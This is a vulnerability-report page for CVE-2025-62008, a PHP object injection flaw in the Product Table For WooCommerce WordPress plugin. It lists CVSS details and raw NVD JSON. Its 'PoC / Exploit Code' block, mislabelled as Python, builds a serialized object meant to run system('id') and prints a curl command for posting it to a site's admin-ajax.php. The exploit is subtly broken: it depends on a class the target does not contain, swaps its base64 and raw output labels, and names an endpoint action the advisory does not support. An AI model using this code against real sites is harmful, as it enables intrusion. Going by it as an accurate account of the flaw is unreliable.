Security Vulnerability Report
中文
CVE-2025-62008 CVSS 8.8 HIGH

CVE-2025-62008

Published: 2025-10-22 15:16:03
Last Modified: 2026-04-15 00:35:42

Description

Deserialization of Untrusted Data vulnerability in acowebs Product Table For WooCommerce product-table-for-woocommerce.This issue affects Product Table For WooCommerce: from n/a through <= 1.2.4.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

product-table-for-woocommerce <= 1.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-62008 PoC - Product Table For WooCommerce PHP Object Injection * Target: product-table-for-woocommerce plugin <= 1.2.4 * Vulnerability: Deserialization of Untrusted Data * * This PoC demonstrates the object injection vulnerability by generating * a malicious serialized payload that can trigger code execution when * deserialized by the vulnerable plugin. */ // Generate malicious payload for PHP Object Injection class ProductTableExploit { // This would be customized based on available POP chain in target environment public $callback = 'system'; public $args = ['id']; // Will execute: system('id') function __destruct() { // Magic method triggered during deserialization cleanup if (isset($this->callback)) { call_user_func_array($this->callback, $this->args); } } } $exploit_obj = new ProductTableExploit(); $malicious_payload = serialize($exploit_obj); echo "Malicious Serialized Payload:\n"; echo base64_encode($malicious_payload) . "\n\n"; echo "Payload (Base64 encoded): " . $malicious_payload . "\n"; echo "\nUsage: Send this payload via POST/GET to vulnerable endpoint\n"; echo "Example: curl -X POST 'https://target.com/wp-admin/admin-ajax.php' \\\n"; echo " -d 'action=product_table_action&data=" . urlencode($malicious_payload) . "'\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62008", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:16:02.650", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in acowebs Product Table For WooCommerce product-table-for-woocommerce.This issue affects Product Table For WooCommerce: from n/a through <= 1.2.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/product-table-for-woocommerce/vulnerability/wordpress-product-table-for-woocommerce-plugin-1-2-4-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}